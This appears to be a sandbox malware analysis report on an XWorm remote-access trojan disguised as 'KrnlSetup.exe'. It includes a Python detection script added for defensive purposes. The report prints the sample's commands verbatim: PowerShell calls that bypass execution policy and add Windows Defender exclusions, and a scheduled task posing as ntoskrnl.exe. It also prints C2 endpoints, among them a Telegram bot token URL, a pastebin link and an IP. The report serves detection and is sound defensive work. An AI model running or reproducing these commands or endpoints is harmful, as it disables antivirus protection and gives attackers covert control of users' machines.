Windows Analysis Report
KrnlSetup.exe

Overview

General Information

Sample name: KrnlSetup.exe
Analysis ID: 1572248
MD5: 493ac3e54bae1f0d5a31b68348352f6c
SHA1: 170c49a1115624e8fc5cafe7c33f76e54cf31c7a
SHA256: c89625e4304d4708308a8a4138af28b90d490e8bd29ccdf3bc1f567d9644a7d7
Tags: exe, user-lontze7

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • KrnlSetup.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\KrnlSetup.exe" MD5: 493AC3E54BAE1F0D5A31B68348352F6C)
    • powershell.exe (PID: 3848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5804 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2228 cmdline: "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5236 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 2284 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • ntoskrnl.exe (PID: 5428 cmdline: C:\ProgramData\ntoskrnl.exe MD5: 493AC3E54BAE1F0D5A31B68348352F6C)
  • ntoskrnl.exe (PID: 652 cmdline: "C:\ProgramData\ntoskrnl.exe" MD5: 493AC3E54BAE1F0D5A31B68348352F6C)
  • ntoskrnl.exe (PID: 2328 cmdline: "C:\ProgramData\ntoskrnl.exe" MD5: 493AC3E54BAE1F0D5A31B68348352F6C)
  • cleanup
Malware configuration

{"C2 url": ["https://pastebin.com/raw/5FinF5Mf"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "drivers.exe", "Version": "XWorm V5.2"}
{"C2 url": "https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage"}
Yara matches: initial sample
Source | Rule | Description | Author | Strings
KrnlSetup.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
KrnlSetup.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
KrnlSetup.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
KrnlSetup.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
KrnlSetup.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10970:$s6: VirtualBox
  • 0x108ce:$s8: Win32_ComputerSystem
  • 0x132b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1334f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x13464:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x11d8c:$cnc4: POST / HTTP/1.1

Yara matches: PCAP (network traffic)
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security

Yara matches: dropped files
Source | Rule | Description | Author | Strings
C:\ProgramData\ntoskrnl.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
C:\ProgramData\ntoskrnl.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\ProgramData\ntoskrnl.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\ProgramData\ntoskrnl.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
C:\ProgramData\ntoskrnl.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10970:$s6: VirtualBox
  • 0x108ce:$s8: Win32_ComputerSystem
  • 0x132b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1334f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x13464:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x11d8c:$cnc4: POST / HTTP/1.1

Yara matches: memory dumps
Source | Rule | Description | Author | Strings
00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2614356137.0000000002597000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x143e8:$s6: VirtualBox
  • 0x14346:$s8: Win32_ComputerSystem
  • 0x16d2a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x16dc7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x16edc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x15804:$cnc4: POST / HTTP/1.1
(8 further memory-dump entries are collapsed in the original report)

Yara matches: unpacked PEs
Source | Rule | Description | Author | Strings
0.2.KrnlSetup.exe.25ee020.1.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.KrnlSetup.exe.1c0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.KrnlSetup.exe.1c0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.KrnlSetup.exe.1c0000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.0.KrnlSetup.exe.1c0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10970:$s6: VirtualBox
  • 0x108ce:$s8: Win32_ComputerSystem
  • 0x132b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1334f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x13464:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x11d8c:$cnc4: POST / HTTP/1.1

                                    System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KrnlSetup.exe", ParentImage: C:\Users\user\Desktop\KrnlSetup.exe, ParentProcessId: 7120, ParentProcessName: KrnlSetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', ProcessId: 3848, ProcessName: powershell.exe

Source: Process started
Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
Data: Command: C:\ProgramData\ntoskrnl.exe, CommandLine: C:\ProgramData\ntoskrnl.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\ntoskrnl.exe, NewProcessName: C:\ProgramData\ntoskrnl.exe, OriginalFileName: C:\ProgramData\ntoskrnl.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\ProgramData\ntoskrnl.exe, ProcessId: 5428, ProcessName: ntoskrnl.exe

Source: Process started
Author: frack113
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KrnlSetup.exe", ParentImage: C:\Users\user\Desktop\KrnlSetup.exe, ParentProcessId: 7120, ParentProcessName: KrnlSetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', ProcessId: 3848, ProcessName: powershell.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: C:\ProgramData\ntoskrnl.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KrnlSetup.exe, ProcessId: 7120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntoskrnl

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KrnlSetup.exe", ParentImage: C:\Users\user\Desktop\KrnlSetup.exe, ParentProcessId: 7120, ParentProcessName: KrnlSetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', ProcessId: 3848, ProcessName: powershell.exe

Source: File created
Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
Data: EventID: 11, Image: C:\Users\user\Desktop\KrnlSetup.exe, ProcessId: 7120, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KrnlSetup.exe", ParentImage: C:\Users\user\Desktop\KrnlSetup.exe, ParentProcessId: 7120, ParentProcessName: KrnlSetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', ProcessId: 3848, ProcessName: powershell.exe
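The process tree and the Sigma matches above record one installation chain: PowerShell launched with -ExecutionPolicy Bypass to add Defender path and process exclusions, a copy of the sample dropped as C:\ProgramData\ntoskrnl.exe, a scheduled task re-launching it every minute with the highest run level, a Run key and a Startup-folder .lnk, and a .bat in %TEMP% run through cmd.exe. The Python below is an added example, not Joe Sandbox code and not the sample's code: it applies the equivalent checks to process-creation events (image path plus command line, as Sysmon event 1 or Windows event 4688 would record them). The sample events are constructed from the report's process tree; the event field names, tag names and the "chain" rule are this example's own choices.

```python
import re
from pathlib import PureWindowsPath

# Added detection example; not Joe Sandbox code and not the sample's code.
# Windows binaries that only ever run from the system directories.
# ntoskrnl.exe is the kernel image and is never a user-mode process, so a
# process by that name is anomalous wherever it runs from.
SYSTEM_BINARY_NAMES = {
    "ntoskrnl.exe", "svchost.exe", "csrss.exe", "lsass.exe", "smss.exe",
    "winlogon.exe", "services.exe", "wininit.exe", "dwm.exe",
}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")

DEFENDER_EXCLUSION = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b", re.I)
# powershell.exe accepts any unambiguous prefix of -ExecutionPolicy (-ep, -exec, ...).
EXECPOLICY_BYPASS = re.compile(r"-e[px]\w*\s+(?:Bypass|Unrestricted)\b", re.I)
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.I)
SCHTASKS_MINUTE = re.compile(r"/sc\s+minute\b(?:.*?/mo\s+(\d+))?", re.I)
SCHTASKS_TARGET = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)
TEMP_BAT = re.compile(r'cmd(?:\.exe)?\s+/c\s+"*[^"]*\\Temp\\[^"]*\.bat\b', re.I)


def outside_system_dirs(path):
    """Sigma 'System File Execution Location Anomaly': a system-binary name
    executing from outside the Windows system directories."""
    p = PureWindowsPath(path)
    name = p.name.lower()
    if name == "ntoskrnl.exe":
        return True
    return name in SYSTEM_BINARY_NAMES and not str(p.parent).lower().startswith(SYSTEM_DIRS)


def classify_command(image, cmdline):
    """Return the set of behaviour tags for one process-creation event."""
    tags = set()
    name = PureWindowsPath(image).name.lower()
    if outside_system_dirs(image):
        tags.add("system_binary_location_anomaly")
    if name == "powershell.exe":
        if EXECPOLICY_BYPASS.search(cmdline):
            tags.add("powershell_execpolicy_bypass")
        if DEFENDER_EXCLUSION.search(cmdline):
            tags.add("defender_exclusion_added")
    if name == "schtasks.exe" and SCHTASKS_CREATE.search(cmdline):
        tags.add("schtasks_create")
        m = SCHTASKS_MINUTE.search(cmdline)
        if m and int(m.group(1) or 1) <= 5:  # /sc minute /mo 1: relaunched every minute
            tags.add("schtasks_high_frequency")
        if re.search(r"/rl\s+highest\b", cmdline, re.I):
            tags.add("schtasks_highest_runlevel")
        t = SCHTASKS_TARGET.search(cmdline)
        if t and outside_system_dirs(t.group(1) or t.group(2)):
            tags.add("schtasks_target_masquerade")
    if name == "cmd.exe" and TEMP_BAT.search(cmdline):
        tags.add("cmd_runs_temp_batch")
    return tags


def analyze(events):
    """Map pid -> tags for a list of {'pid', 'image', 'cmdline'} events."""
    return {e["pid"]: classify_command(e["image"], e["cmdline"]) for e in events}


# Defence evasion, high-frequency persistence and a masqueraded system binary
# seen together in one tree is what separates this installer from an admin
# script that merely adds an exclusion (threshold is this example's choice).
CHAIN = {"defender_exclusion_added", "schtasks_high_frequency", "system_binary_location_anomaly"}


def chain_verdict(events):
    seen = set().union(*(classify_command(e["image"], e["cmdline"]) for e in events))
    return CHAIN <= seen


def ev(pid, image, cmdline):
    return {"pid": pid, "image": image, "cmdline": cmdline}


# Constructed sample events, taken from the process tree in this report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PSQ = '"' + PS + '"'
SAMPLE_EVENTS = [
    ev(7120, r"C:\Users\user\Desktop\KrnlSetup.exe", r'"C:\Users\user\Desktop\KrnlSetup.exe"'),
    ev(3848, PS, PSQ + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'"),
    ev(6100, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ev(1516, PS, PSQ + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'"),
    ev(5804, r"C:\Windows\System32\schtasks.exe",
       r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"'),
    ev(2228, r"C:\Windows\System32\schtasks.exe", r'"C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"'),
    ev(5236, r"C:\Windows\system32\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""'),
    ev(2284, r"C:\Windows\System32\timeout.exe", "timeout 3"),
    ev(5428, r"C:\ProgramData\ntoskrnl.exe", r"C:\ProgramData\ntoskrnl.exe"),
]

if __name__ == "__main__":
    for pid, tags in analyze(SAMPLE_EVENTS).items():
        print(pid, sorted(tags))
    print("evasion+persistence chain:", chain_verdict(SAMPLE_EVENTS))
```

Two things worth noting in the rules: the execution-policy check matches parameter prefixes because powershell.exe accepts them, so a later variant using -ep or -exec is still caught; and the location-anomaly check special-cases ntoskrnl.exe because the kernel image is never a user-mode process, so the path does not need to be consulted at all for that name.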
Suricata alerts, SID 2853685
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T10:05:01.393762+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 149.154.167.220 | 443 | TCP
Suricata alerts, SID 2852870
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T10:05:14.455517+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP
2024-12-10T10:05:22.882125+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP
2024-12-10T10:05:26.747572+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP
2024-12-10T10:05:29.838493+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP
Suricata alerts, SID 2852923
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T10:05:14.479696+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.388438+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.508839+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.629374+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.748806+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.868343+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.988429+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.109747+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.229755+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.349751+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.469250+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.588749+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.709750+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.829229+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.917850+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.148168+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.269031+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.388499+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.507997+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.617874+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.746512+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.865936+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.105359+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.208331+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.328595+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.448019+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.567924+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.687430+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.802604+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.922164+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.045611+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.165329+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
